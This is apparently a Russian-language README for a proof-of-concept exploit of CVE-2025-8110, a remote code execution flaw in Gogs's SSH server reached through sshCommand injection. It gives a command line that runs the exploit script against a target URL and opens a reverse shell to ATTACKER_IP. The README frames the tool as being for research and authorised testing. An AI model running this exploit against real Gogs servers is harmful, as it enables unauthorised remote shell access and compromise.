
CVE-2025-8110 PoC
Этот репозиторий содержит Proof of Concept (PoC) для CVE-2025-8110, уязвимости удаленного выполнения кода (RCE) в Gogs. Эксплойт нацелен на внутреннюю реализацию SSH-сервера, позволяя атакующим внедрять вредоносные команды через конфигурацию sshCommand.
Для запуска эксплойта используйте скрипт CVE-2025-8110.py, указав целевой URL Gogs и ваш IP-адрес/порт для прослушивания обратной оболочки.
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: Базовый URL целевого экземпляра Gogs (например, http://localhost:3000).-lh, --host: IP-адрес, на который должна подключиться обратная оболочка.-lp, --port: Порт, на который должна подключиться обратная оболочка.-x, --proxy: (Необязательно) Использовать локальный прокси на http://localhost:8080 для отладки.Этот Proof of Concept (PoC) предназначен только для образовательных и исследовательских целей. Он призван помочь специалистам по безопасности и администраторам понять и смягчить последствия уязвимости CVE-2025-8110.
Автор не несет ответственности за любое несанкционированное или злонамеренное использование этого кода. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Используя этот код, вы соглашаетесь взять на себя полную ответственность за свои действия.